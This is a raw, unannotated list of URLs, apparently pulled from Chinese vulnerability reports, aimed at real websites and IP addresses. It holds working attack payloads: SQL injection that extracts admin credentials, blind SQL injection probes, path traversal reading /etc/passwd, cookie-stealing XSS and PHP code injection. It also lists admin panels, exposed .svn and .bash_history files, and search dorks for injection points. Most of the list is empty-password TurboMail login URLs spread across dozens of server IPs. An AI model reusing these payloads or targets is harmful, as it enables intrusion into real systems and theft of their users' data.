http://www.gxtc.edu.cn/ http://food.gd.sina.com.cn/article.php?t=rstrt&id=25671 http://food.gd.sina.com.cn/admin/login.php http://it.11185.cn:80/chinapostintegrate/emailActivation.a?mailMassage=009977&sendEmail=XXXXXX@qq.com'激活邮箱 http://it.11185.cn/chinapostintegrate/emailActivation.a?mailMassage=009977&sendEmail=XXXXXqq.com&contactId=1157123 http://img.taobao.com/tfscom/T1Rq4fFFdaXXc1tVjX.htm http://monitor.hbepb.gov.cn/PBBS/publicnoticeservlet?command=findInfoByUUID&public_type=1&attach_uuid=8aaab3ab3e44b35b013e7d89df7510b7 http://w.game.tom.com/plus/flink.php http://w.game.tom.com/yeyou_admin/login.php?gotopage=%2Fyeyou_admin%2F http://180.168.217.185/ http://180.168.217.166/ http://club.suning.com site:club.suning.com inurl:profile http://61.188.177.149/index.aspx http://forum.fengyunzhibo.com:9002/ http://www.52moxing.com/home/backup/ https://211.65.8.130/user/main/ http://www.nmec.org.cn/pages/pagemap.html http://211.68.9.78/home.php?index=home www.youyuan.com ftp://disease.fx120.net http://www.baidu.com/s?ie=utf-8&bs=site%3Afx120.net&f=8&rsv_bp=1&wd=site%3Afx120.net+%E5%8D%9A%E5%BD%A9&rsv_sug3=3&rsv_sug4=66&rsv_sug2=0&inputT=1412 http://www.baidu.com/s?ie=utf-8&bs=site%3Afx120.net+%E5%8D%9A%E5%BD%A9&f=8&rsv_bp=1&wd=site%3Afx120.net+%E6%97%B6%E6%97%B6%E5%BD%A9&rsv_sug3=14&rsv_sug4=504&rsv_sug1=1&rsv_sug2=0&inputT=3817 http://departs.glut.edu.cn/mksxy/company.asp^ename=intro http://departs.glut.edu.cn/mksxy/jgsz.asp?cls=0^ename=kyjg http://departs.glut.edu.cn/mksxy/schools.asp?cls=0^ename=sdfc http://departs.glut.edu.cn/mksxy/kcjs.asp?cls=0^ename=cghj http://departs.glut.edu.cn/mksxy/kygz.asp?cls=0^ename=kylj http://departs.glut.edu.cn/mksxy/yqsjy.asp?cls=0^ename=zsjy http://departs.glut.edu.cn/mksxy/djgz.asp?cls=0^ename=ghgz http://departs.glut.edu.cn/mksxy/new.asp?cls=0^ename=notice http://departs.glut.edu.cn/mksxy/lytt.asp?cls=0^ename=xsjz http://departs.glut.edu.cn/mksxy/jgszs.asp?cls=0^ename=xyfc url:http://departs.glut.edu.cn/cgg/View.asp?ArticleID=1340 http://departs.glut.edu.cn/cgg/More.asp?BigClassName=xxx&SmallClassName=99999999 http://glxy.glut.edu.cn/team.php?pid=99999999 http://glxy.glut.edu.cn/class.php?do=a&pid=5 data:pid=5 http://glxy.glut.edu.cn/class.php?do=a&pid=99999999 url:http://glxy.glut.edu.cn/inter.php?id=64 data:id=64 http://glxy.glut.edu.cn/mba.php?pid=99999999 data:pid=99999999 http://dangjian.ccnt.com.cn/ http://www.ccnt.com.cn/ http://www.ccnt.com.cn/zxdt.php?col=550&file=40374 http://news.ccnt.com.cn/whps.php?col=9&file=26873 http://dangjian.ccnt.com.cn/zxdt.php?col=550&file=40374 http://speed.sc.189.cn/chinatel/u.shtml http://sc.189.cn/service/pwdReset/pwdReset_KD.jsp http://zsxx.yjsy.ecnu.edu.cn/cxwj/bsbmxx_detail_ad.asp?id= http://www.wzu.edu.cn/bf.rar http://pub.gdepb.gov.cn/pub/epa/company_info_view.jsp?caseUuid=aec73fa4-013c-1000-e000-02f50a0a0a02 http://grid1.jlu.edu.cn/admin/adminlogin.php www.worlduc.com http://mssf.henu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/* http://2013.ceair.com/mu/front/reservation/email!doPrintOrd.shtml?ordno=100309100**** http://2010.ceair.com/mu/front/reservation http://kdjyxk.spb.gov.cn/register_comlogin.do;jsessionid=F9D74EFE178C5B6B2516022F4C4826C1 http://kdjyxk.spb.gov.cn/register_comlogin.do;jsessionid=F9D74EFE178C5B6B2516022F4C4826C1 https://www.hzt360.com/login http://180.149.157.110,是监控部某系统 http://open.youku.com/assets/lib/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://js.ct10000.com http://shop.paixie.net/?m=admin&a=forgot&s=3&type=email&code=ZWIxZjNjYjg2ZjhkOGQ2MjE3ZjAxNjA0YmZiZmIyY2N8MjI3Mw== http://www.10086.cn/jx/,点击网上营业厅选择交话费享优惠进入页面,如下图 www.vmovier.com/activity/index/cateid/51 www.vmovier.com/activity/index/cateid/51* url:http://10010.bbn.com.cn/index.php?s=/CloudAudio/addinfo url:http://wlan.bbn.com.cn:8089/n_wlan/info.php http://www.health.neu.edu.cn/ http://www.health.neu.edu.cn/Admin/ http://el.homeinns.com///WEB-INF/web.xml http://content.homeinns.com/WEB-INF/web.xml http://content.homeinns.com http://content.homeinns.com/css/.svn/entries http://content.homeinns.com/images/.svn/entries http://content.homeinns.com/inc/.svn/entries http://home.xdf.cn/ http://house.focus.cn/housemarket/loushu/more.php http://house.focus.cn/housemarket/loushu/more.php http://mall.10010.com/goodsdetail/511301296290.html,先是选号,填写帐号资料 http://mac.xunlei.com/app/soft/details.php?soft_id=1140 https://www.gzekt.com/CustNologinAction_register.action?message=1,xxxxxxxx,-1 https://www.gzekt.com/CustNologinAction_register.action?message=1,yyyyyyyy,zz http://item.taobao.com/item.htm?id=26396192644 https://mail.sgcc.com.cn/ http://nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399 http://house.focus.cn/housemarket/video/video_search.php?salestatus=3 http://house.focus.cn/housemarket/video/video_search.php?location=8 http://www.idc.com.cn/prodserv/RA.jsp?nra=RA http://www.idc.com.cn/prodserv/RA.jsp?nra=R'%2b'A http://www.idc.com.cn/prodserv/RA.jsp?nra=R'20'A http://www.idc.com.cn/prodserv/RA.jsp?nra=R'||'A http://yuancheng.xunlei.com/,输入帐号密码登录了。 http://www.cr20g2.com/newsclass.aspx?acction=6 http://www.google.com.hk/#filter=0&newwindow=1&q=inurl:login/List.aspx%3FID%3D&safe=strict http://www.google.com.hk/#newwindow=1&q=inurl:%2Flogin%2FDetail.aspx&safe=strict http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721 http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721 http://www.u51.com https://gist.github.com/ah8r/10632982证明,谢谢!! http://www.jlnu.edu.cn/new/xshdmore.php?classid=4 http://mjzz.jsmz.gov.cn/web/news.aspx?item_id=5226 http://home.focus.cn/materials/search_result.php http://www.szxcfy.gov.cn/news_show.php?tid=73&id=313 http://volvocars.youku.com/api/staples/video-box.php?vid=XNDY5NDUxNDM2 http://open.youku.com/docs/.svn/entries http://open.youku.com/assets/.svn/entries http://trt.youku.com/index.php http://mac.xunlei.com/app/soft/list.php?c=5 http://mac.xunlei.com/app/soft/list.php?c=5-1 http://bjhdfy.chinacourt.org/public/more.php?LocationID=1200000000 http://tide.youku.com/ http://tide.youku.com/search.php?key=1&t=1 http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/passwd%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/hosts%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/my.cnf%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/rc.local%00.jpg http://add.11185.cn/vir_add_front/owner/addressService.a http://360buy.lejuopen.letv.com/css/index_base.css/%20\0.php http://360buy.lejuopen.letv.com/css/index_base.css%00.php http://360buy.lejuopen.letv.com/css/index_base.css/a.php http://api.mkf360.com/api.php中的user_id变量没有做好权限控制,输入其他人id即可读到信息,这样以来登陆认证形同虚设! http://api.mkf360.com/api.php?m=Order&a=orderList&user_id={uid变量}&nowpage=1 http://api.mkf360.com/api.php?m=Address&a=addrlist&user_id={uid变量}&nowpage=1 http://api.mkf360.com/api.php?m=Favorites&a=add&goods_id={物品id}&user_id={uid变量 http://api.mkf360.com/api.php?m=Favorites&a=del&goods_id={物品id}&user_id={uid变量 http://api.mkf360.com/api.php?m=Comment&a=listbyuser&user_id={uid变量 http://api.mkf360.com/api.php?m=Comment&a=delete&comment_id={评论id http://www.zhihu.com/draft/clear http://www.ehbab.com/notice.asp?id=1858 url:http://118.194.32.61/ArticleUpdas.aspx http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29 http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29 http://www.wangfengcn.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D http://www.fatezero.org/download/eyou_mail_system_analysis.zip http://ued.ctrip.com/blog/ http://hot.weibo.com/hot?v=1899%20and%20if%28%28%201=1%20%29,1,%28select%201%20union%20select%202%29%29%23 http://hot.weibo.com/hot?v=1899%20and%20if%28%28%201=2%20%29,1,%28select%201%20union%20select%202%29%29%23 http://hot.weibo.com/hot?v=1899%20and%20exists%20%28select%20*%20from%20dual%29%23 http://zone.it.sohu.com/admin http://www.chinapost.com.cn/.bash_history martynel.go.ro/e.gz;tar martynel.go.ro/e.gz;tar http://zixun.tuan800.com http://www.csxdf.com//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.csxdf.com/xdfadmin/login.php http://a-k.taobaottt7.com./xg8/www/admin/ http://a-k.taobaottt7.com./xg6/www/admin/Netsys_Manage.asp http://a-k.taobaottt7.com./xg1/www/admin/ http://a-k11.taobaottt7.com./xg5/www/admin/ http://a-k.taobaottt7.com./xg/www/admin/ http://www.bppa.org.cn/count/login.asp http://www.tudou.com/groups/posts3809897p1.html http://www.tudou.com/groups/posts3809887p1.html inurl:asp?id=,可以找到一大把的SQL注射点。现在通过这样的关键字找到的注入点就会相对来说少一点了。但并不是SQL的注入点因此而少许多。 http://www.nwnu.edu.cn/,用啊D扫描注入点。一下就找到了注入点 http://yjsy.nwnu.edu.cn/Index.php?g=Home&m=Content&a=index&t=Default&webid=27&id=3 http://zsbgs.bfsu.edu.cn/ http://zsbgs.bfsu.edu.cn/tiyu/public/enroll_query.jsp https://xjda.gov.cn/ http://tousu.auto.sohu.com/ http://bjxwgl.homelink.com.cn/usr/login.action http://tjxwgl.homelink.com.cn/usr/login.action http://njxwgl.homelink.com.cn/usr/login.action android:name=".activity.ForwardRecentActivity android:launchMode="singleTop android:screenOrientation="portrait android:configChanges="locale|keyboardHidden|orientation android:alwaysRetainTaskState="true android:windowSoftInputMode="adjustPan android:name="com.tencent.intent.QQ_FORWARD android:name="android.intent.category.DEFAULT http://www.js165.com/index.html沃江苏门户,江苏联通的朋友用手机上网上时有时候是不是跳转到这个页面 http://www.js165.com/iportaladmin5,随手admin http://www.js165.com/iportaladmin5/Res/App/tt.asp http://coupon.live.189.cn/123.rar http://oa.ctrl.189.cn/web/.svn/entries http://118.122.112.10:8896/admin/login.jsp http://e.118114.cn:8118/ShanglvTrain/query/queryTrainTicketJson.do http://e.118114.cn:8118/ShanglvTrain/cc.jsp http://bbs.jianshe99.com/这个论坛 http://i.youku.com/u/get_status?&uid=156999999 http://www.cdssyy.cn/ewebeditor/admin_style.asp http://hd.chinatax.gov.cn/consult/login.do http://hd.chinatax.gov.cn/consult/registedit.jsp?userLogin=user1 http://hd.chinatax.gov.cn/consult/registedit.jsp?userLogin=admin http://intv.inewsweek.cn/video.php?id=13 http://intv.inewsweek.cn/video.php?type=video&id=11 http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 http://uvu.cc/viewPage.do?id=1320 http://a.120ask.com/forget_pwd?go=1&from= http://a.120ask.com/setpwd?from=aHR0cDovL3d3dy4xMjBhc2suY29t&p=MjQ1ODQ4OTY=&r=用户名&v=用户名 http://a.120ask.com/setpwd?from=aHR0cDovL3d3dy4xMjBhc2suY29t&p=MjQ1ODQ4OTY=&r=用户名&v= http://www.shangzhi.gov.cn/content.php?id=1033 http://202.198.0.22/jiaowu/zpx/szwyadmin/login.asp http://***.***.cn/ http://zhaopin.cscec3b.com.cn/page/home/subsidiary/jobMore.action?unitId=1020108 http://zhaopin.cscec3b.com.cn/page/home/subsidiary/index.action?unitId=1020108 http://zhaopin.cscec3b.com.cn/page/home/subsidiary/index.action?unitId=1020108 xxx.com/BG/Mail/UMessageBrowse.aspx?mailid=XXXXX XXX.com/XS/Zsjy_xs01/Graduate/GraduateView.aspx?CellID= XX.com/JX/XKGL_jx06/Admin/BaseSetting/MaintainPassword/MaintainPassword.aspx?CellID=可修改学生密码 http://www.greenbeijing.org/ldgh/ldgh_wz.asp?classid=01040101 http://project.youku.com/minisite/admin/user_login.php#admin www.ccard.net.cn http://slo.zqgame.com/login.html http://trp.jlu.edu.cn:8000/test2/ inurl:inurl:homepages/login_page.aspx http://www.jiangsuqsh.com/homepages/login_page.aspx http://www.tssfxz.gov.cn/homepages/login_page.aspx http://221.226.94.198/njwt/homepages/login_page.aspx http://58.213.48.219:8080/homepages/login_page.aspx南京化学工业园区OA及业务平台 http://old.jskx.org.cn/50web/homepages/login_page.aspx江苏省科协50周年内容管理平台 http://222.143.24.51/hnsfy/homepages/login_page.aspx司法部法律援助信息管理系统 http://218.202.112.110/nmgfy/homepages/login_page.aspx司法部法律援助信息管理系统 http://222.82.219.223/xjbtfy/homepages/login_page.aspx http://125.69.150.192:8081/scsfy/homepages/login_page.aspx http://59.175.148.41/HBSFY/homepages/login_page.aspx http://www.sipoutsourcing.com/cms/mcmgr/loadMemberByKey.action?membId=22281 http://mserver.e-cology.cn/home.html http://59.72.25.2:8282/config/insertSA.htm http://www.setv.com.cn http://www.setv.com.cn/shows/?album=756 http://www.setv.com.cn/shows/?album=756 https://portal.qiniu.com/operate-confirm/delete-bucket?bucket=adminfw http://jncc.nuaa.edu.cn/ http://search.dangdang.com/?key=xxx%22%27%3E&category_id=4008328&tab_type=eq0 http://www.heerit.com/dxanli.htm http://www.google.de/#filter=0&newwindow=1&q=inurl:/forget_password.jsp+%22%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%22 http://0101.ruc.edu.cn/ http://www.7huayu.com/programs/List.aspx?SKeyWord=WCRTESTINPUT000000 http://www.7huayu.com/Programs/List.aspx?SKeyWord=短袖T恤 http://tuan.7huayu.com/Programs/list.aspx?category=99999999 http://tuan.7huayu.com/Programs/help.aspx?id=13 http://tuan.7huayu.com/Programs/list.aspx?category=7 http://tuan.7huayu.com/Programs/list.aspx?category=99999999 http://fx.7huayu.com/list.aspx?cateid=19 http://fx.7huayu.com/list.aspx?cateid=99999999 http://fx.7huayu.com/list.aspx?cateid=19 http://fx.7huayu.com/classlist.aspx?id=99999999 http://202.4.153.84/book/detailBook.jsp?rec_ctrl_id=0100012423 http://www.liebo.com/services/AddressService.svc/GetDeliveryAddress http://www.turbomail.org/ http://www.sogou.com/web?%3Bchuidq=32&query=turbomail%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F&%3Binteration=196640&page=4 http://114.255.255.98/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.124.195.199/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.124.195.199/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.106.135.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.38.226.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.38.226.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.74.197/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.74.197/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.127.253.46/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.127.253.46/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://116.231.187.174/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://116.231.187.174/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.235.165/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.103.235.165/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.222.162/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.144.222.162/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://122.226.156.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.226.156.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.178.189.138/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.114.35.30/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.38.226.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.38.226.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.154.142.249/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://211.154.142.249/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.154.142.249/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.154.142.249/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.247.63.215/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.247.63.215/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.62.64.186/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.42.228.121/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.42.228.121/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://180.168.218.36/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://180.168.218.36/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://110.16.65.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://110.16.65.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://110.16.65.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.206.24.195/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.206.24.195/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.206.24.195/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.206.24.195/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.25/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://116.252.221.110/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://121.33.205.234/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://121.33.205.234/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://121.33.205.234/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://121.33.205.234/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.127.253.46/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.127.253.46/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.42.228.121/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.42.228.121/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.247.255.93/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.117.43.134/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.117.43.134/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.208.76.102/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://60.208.76.102/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://183.63.90.178/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.90.178/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://180.168.218.36/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://180.168.218.36/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.108.58.99/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.49.85.100/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://111.3.156.73/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://111.3.156.73/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.67.159.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.61.29.29/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.225.61.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.247.63.215/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.247.63.215/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.199.112.6/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise 